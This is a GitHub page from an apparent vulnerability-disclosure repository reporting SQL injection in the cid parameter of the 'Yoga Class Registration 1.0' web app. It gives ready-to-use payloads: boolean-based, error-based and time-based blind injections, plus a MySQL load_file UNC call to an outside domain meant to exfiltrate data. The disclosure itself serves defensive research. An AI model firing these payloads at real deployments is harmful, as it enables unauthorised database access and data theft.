Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/oretnom23/2023/Yoga-Class-Registration -1.0-2023 - Multiple-SQLi/
CVE-nu11secur1ty/vendors/oretnom23/2023/Yoga-Class-Registration -1.0-2023 - Multiple-SQLi/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

Yoga-Class-Registration -1.0-2023 - Multiple-SQLi

Vendor - oretnom23

Description:

The cid parameter appears to be vulnerable to Multiple-SQL injection attacks. The payload '+(select load_file('\\aaob4nk5vd0lv9e50qp2c5c1dsjl7iv9yxpkg85.stupid.com\shs'))+' was submitted in the cid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker easily can steal all information about this server and this could be awful for all users of this system.

STATUS: HIGH Vulnerability - CRITICAL

[+]Payload:

---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=yclasses/registration&cid=158158925' or '6060'='6060' AND 7469=7469 AND 'IrlM'='IrlM

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p=yclasses/registration&cid=158158925' or '6060'='6060' AND (SELECT 6894 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT (ELT(6894=6894,1))),0x716a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CykB'='CykB

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=yclasses/registration&cid=158158925' or '6060'='6060' AND (SELECT 9785 FROM (SELECT(SLEEP(3)))edGv) AND 'KLgd'='KLgd
---

Reproduce:

href

Proof and Exploit:

href

Time spend:

01:00:00